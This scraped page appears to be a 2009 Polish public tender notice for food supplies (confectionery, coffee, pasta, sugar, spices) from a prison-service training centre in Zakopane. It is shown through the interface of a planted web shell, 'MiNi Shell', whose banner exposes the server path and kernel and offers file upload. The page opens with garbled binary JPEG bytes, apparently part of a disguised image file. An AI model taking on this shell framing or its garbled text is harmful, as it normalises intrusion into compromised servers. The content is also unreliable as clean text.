JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/23766-N-2009.html

<p class="kh_header"><b>Zakopane: Dostawa różnych produktów spożywczych</b><br>
<b>Numer ogłoszenia: 23766 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Doskonalenia Kadr Służby Więziennej w Zakopanem , ul. Ogrodowa 6, 34-500 Zakopane, woj. małopolskie, tel. 0-18 2013431, faks 0-18 2013431 wew. 813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.sw.gov.pl/index.php/jednostki/6/319</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka sektora finansów publicznych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa różnych produktów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa różnych produktów spożywczych z grupy 158 w następujących ilościach:

Określona ilość towaru jest wielkością szacunkową. Zamawiający nie gwarantuje zrealizowania całości zamówienia.

Grupa I Wyroby piekarskie, ciastkarskie, cukier, oraz różne produkty spożywcze
Lp.	Nazwa towaru	J.m	Ilość 
1	Baton Snickers od 40g do 70g netto	Szt	800
2	Baton Mars od40g do 60g netto	Szt	700
3	Prince polo od 30g do 50g netto	Szt	250
4	Herbatniki Pieguski od 100g do 200g netto	kg	80
5	Ciasteczka Jeżyki 100g do 200g netto	kg	80
6	Cukierki mini karton od 1000g do 3000g	kg	20
7	Czekolada mleczna 100g	kg	20
8	Princessa od 30g do 50g	Szt.	200
9	Wafle Grześki od 30g do 50g netto	szt	300
10	Paluszki sezamowe od 100g do 300g netto	kg	20
11	Paluszki słone od 100g do 300g netto	kg	50
12	Pierniki okrągłe od 100g do 500g netto	kg	20
13	Delicje szampańskie od 100g do 300g netto	kg	100
14	Herbata Lipton pakowana w kartoniki od 50szt do 100szt w saszetkach z zawieszką waga sztuki 0,002g 	kg	100
16	Herbata Dilmah Ceylon pakowana w kartoniki od 50szt do 100szt w saszetkach z zawieszką waga sztuki 0,002g 	kg	50
17	Herbata Eternal pakowana w kartoniki od 50szt do 100szt w saszetkach z zawieszką waga sztuki 0,002g 	kg	150
18	Kawa Ford Exlusiv od 200g do 600g 	kg	100
19	Kawa Maxwell Hause rozpuszczalna od 100g do 300g	kg	100
20	Kawa Nescafe Clasic rozpuszczalna od 100g do 300g	kg	100
21	Kawa Jacobs mielona od 100g do 300g	kg	50
22	Kawa Tchibo mielona od 100g do 300g	kg	50
23	Kawa Prima mielona od 100g do 300g	kg	50

Grupa II Produkty z ciasta makaronowego, grzanki, sosy.
L.p	Nazwa towaru	J.m	Ilość 
1	Makaron łazanki typu lubella od 400g do 1000g	kg	100
2	Makaron tarte ciast typu lubella od 250g do 1000g	kg	100
3	Makaron świderki typu lubella od 400g do 1000g	kg	50
4	Makaron kolanka typu lubella od 400g do 1000g	kg	50
5	Makaron nitka typu lubella od 400g do 1000g. 	kg	50
6	Makaron gwiazdki typu lubella od 400g do 1000g	kg	50
7	Makaron muszelki duże typu lubella od 400g do 1000g	kg	50
8	Makaron gruba rurka typu lubella od 400g do 1000g	kg	50
9	Makron wstążki typu lubella od 400g do 1000g	kg	50
10	Makaron Spaghetti typu lubella od 400g do 1000g	kg	50
11	Makaron Lasagne typu lubella od 400g do 1000g	kg	20
12	Groszek ptysiowy od 100g do 500g	kg	50

Grupa III Cukier, produkty pokrewne, miód
L.p	Nazwa towaru	J.m	Ilość 
1	Cukier pakowany w torebkach papierowych 1 kg	Kg	3500
2	Cukier puder pakowany w torebkach papierowych 0,5 kg	Kg	250
3	Cukier wanilinowy od 20g do 50g	kg	30
4	Miód prawdziwy słoik od 200g do 400g	kg	20
5	Miód porcjowany od 15g do 30g	kg	150
6	Miód sztuczny 400g	kg	20

Grupa IV Mieszanki przypraw 
Lp.	Nazwa towaru	J.m	Ilość 
1	Skórka pomarańczowa w opakowaniu od 100g do 200g 	kg	1
2	Budyń śmietankowy w opakowaniu od 30g do 50g	kg	20
3	Cynamon w opakowaniu od 10g do 30g	kg	2
4	Przyprawa do ryb typu Knora w opakowaniu od 20g do 1000g	kg	5
5	Ketchup łagodny w opakowaniach z dozownikiem w opakowaniu od 250g do 500g	kg	200
6	Kisiel w opakowaniu od 40g do 100g 	kg	20
7	Kminek w opakowaniu od 10g do 100g	kg	5
8	Kwasek cytrynowy w opakowaniu od 10g do 100g	kg	10
9	Liść laurowy w opakowaniu od 10g do 100g	kg	3
10	Majeranek w opakowaniu od 15g do 100g	kg	5
11	Musztarda łagodna w opakowaniach z dozownikiem od 250g do 500g	kg	200
12	Ocet spirytusowy w butelkach od 0,5l do 1l	L	100
13	Ocet winny w butelkach od 0,25l do 0,5l	L	20
14	Papryka słodka w opakowaniu od 10g do 50g	kg	10
15	Papryka ostra w opakowaniu od 10g do 50g	kg	5
16	Majonez typu kielecki przeznaczony do sałatek w słoikach od 250g do 700g	kg	550
17	Pieprz w opakowaniu od 10g do 50g	kg	20
18	Proszek do pieczenia w opakowaniu od 10g do 50g	kg	30
19	Przyprawa do kurczaka w opakowaniu od 10g do 50g	kg	10
20	Przyprawa do zup typu maggi w opakowaniu szklanym 0,5l do 1 l	L	400
21	Rosół z kury typu Knorr kostki od 10g do 20g w opakowaniu od 6szt do 10szt 	kg	100
22	Przyprawa warzywna typu Vegeta w opakowaniu od 0,5kg do 1000g 	kg	100
23	Ziele angielskie w opakowaniu od 5 g do 30g	kg	10
24	Żelatyna spożywcza w opakowaniu od 10g do 100g	kg	20
25	Imbir w opakowaniu od 10g do 30g 	kg	1
26	Żurek śląski w opakowaniu od 40g do 50g 	kg	60
27	Oregano w opakowaniu od 10gdo 30g	kg	1
28	Aromaty do ciast w opakowaniu 6g do 20g 	kg	1
29	Drożdże w kostkach w opakowaniu od 100g do 500g	kg	20
30	Przyprawa do piernika w opakowaniu od 10g do 50g	kg	2
31	Gałka muszkatołowa w opakowaniu od 10g do 50g	kg	1
32	Przyprawa curry w opakowaniu od 10g do 50g	kg	1
33	Goździki w opakowaniu od 10g do 50g	kg	1
34	Soda oczyszczona w opakowaniu od 30g do 100g	kg	5
35	Przyprawa do grilla w opakowaniu od 10g do 50g	kg	5
36	Kakao naturalne w opakowaniu od 80g do 200g 	kg	20
37	Sól w opakowaniu 1 kg	kg	400
38	Kurkuma w opakowaniu od 10g do 50g	kg	1
39	Czosnek granulowany w opakowaniu od 10g do 50g	kg	10.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą brać udział wykonawcy, spełniający warunki określone w SIWZ oraz w spełniający  oraz art. 22  ust., a także nie podlegający wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004. Potwierdzenie spełnienia tych warunków nastąpi na podstawie dokumentów wyszczególnionych w specyfikacji istotnych warunków zamówienia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Formularz ofertowy 
2. Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składani ofert  
3. Oświadczenie o spełnieniu warunków udziału w postępowaniu 
4*. Upoważnienie do podpisania oferty. 
5*. Umowa spółki cywilnej lub umowa spółki z o.o.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Utrzymanie stałej ceny w okresie - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.sw.gov.pl/index.php/zamowienia/6/108.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można otrzymać bezpłatnie w siedzibie zamawiającego (pokój 106) lub pocztą.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2009 godzina 10:00, miejsce: Ofertę należy złożyć w Sekretariacie w siedzibie zamawiającego, pokój numer 102.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com